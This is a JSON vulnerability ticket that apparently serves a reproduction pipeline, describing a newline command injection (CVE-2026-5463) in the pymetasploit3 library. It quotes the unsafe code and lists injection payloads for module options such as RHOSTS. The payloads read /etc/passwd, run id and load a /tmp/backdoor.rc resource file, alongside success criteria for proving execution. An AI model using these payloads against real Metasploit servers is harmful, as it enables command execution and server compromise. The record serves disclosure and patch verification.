{
  "claim": {
    "argus_claim_ref": null,
    "attacker_control": null,
    "claimed_surface": "library_api",
    "expected_impact": "dos",
    "finding_id": null,
    "id": null,
    "required_entrypoint_detail": null,
    "required_entrypoint_kind": "authenticate",
    "submission_reason": "ticket_derived",
    "trigger_class": null,
    "upstream_verdicts": null
  },
  "latest_description": "CRITICAL COMMAND INJECTION - CVE-2026-5463 pymetasploit3 <= 1.0.6\n\n## VULNERABILITY SUMMARY\nUnauthenticated remote attackers can inject arbitrary commands into Metasploit console via newline injection in module options.\n\n## ROOT CAUSE ANALYSIS\nThe run_module_with_output() function in pymetasploit3/msfrpc.py builds Metasploit console commands unsafely:\n\nVULNERABLE CODE (v1.0.6 and earlier):\nfor k in opts.keys():\n    options_str += 'set {} {}\\n'.format(k, opts[k])  // NO SANITIZATION\n\nWhen user-controlled option values (like RHOSTS) contain newlines, they break command structure:\n\nset RHOSTS 192.168.1.1\\n; cat /etc/passwd\\n\nThis terminates the set command and injects arbitrary Metasploit console commands.\n\n## EXPLOITATION PATH\n1. Install pymetasploit3 1.0.6: pip install pymetasploit3==1.0.6\n2. Connect to Metasploit RPC (requires msfrpcd running)\n3. Create exploit module with malicious option:\n   console.run_module_with_output(exploit, options={'RHOSTS': '192.168.1.1\\n; cat /etc/passwd\\n'})\n4. Newline breaks command parsing, executes cat /etc/passwd\n\n## PROOF OF CONCEPT (PAYLOAD)\nInject via any module option like RHOSTS, RPORT, etc.:\n- 192.168.1.1\\n; id - Execute id command\n- 192.168.1.1\\n; workspace -a pwned - Create workspace\n- 192.168.1.1\\n; resource /tmp/backdoor.rc - Load resource file\n\n## SUCCESS CRITERIA\nPROVE command injection (not just error/crash)\nFAILURE: Script errors or connection issues\nSUCCESS: Demonstrate arbitrary command execution within Metasploit console context\n\n## IMPACT\n- Unauthenticated command injection into Metasploit framework\n- Session manipulation\n- Lateral movement\n- Full compromise of Metasploit server\n\n## BLAST RADIUS\n- 406 GitHub stars\n- PyPI package: pip install pymetasploit3\n- Used by penetration testers and red teams\n- Affects all pymetasploit3 <= 1.0.6\n\n## TECHNICAL DETAILS\n- CWE: CWE-77 (Command Injection)\n- CVSS 4.0: 9.3 CRITICAL\n- CVSS 3.1: 8.6 HIGH\n- Affected: versions through 1.0.6\n- Fixed: version 1.0.7+\n\n## REPOSITORY\nhttps://github.com/DanMcInerney/pymetasploit3\n\n## REQUIRED FOR REPRO\n- Python 3.x\n- Metasploit with msfrpcd running\n- pip install pymetasploit3==1.0.6\n\n## REFERENCES\n- https://nvd.nist.gov/vuln/detail/CVE-2026-5463\n- https://github.com/DanMcInerney/pymetasploit3\n- https://dbugs.ptsecurity.com/vulnerability/PT-2026-29988\n\n## PATCH DETAILS\nFixed in 1.0.7 by sanitizing newlines in option values before command construction.",
  "product": "pymetasploit3",
  "severity": "critical",
  "status": "open",
  "summary": "pymetasploit3 command injection",
  "ticket_id": "CVE-2026-5463"
}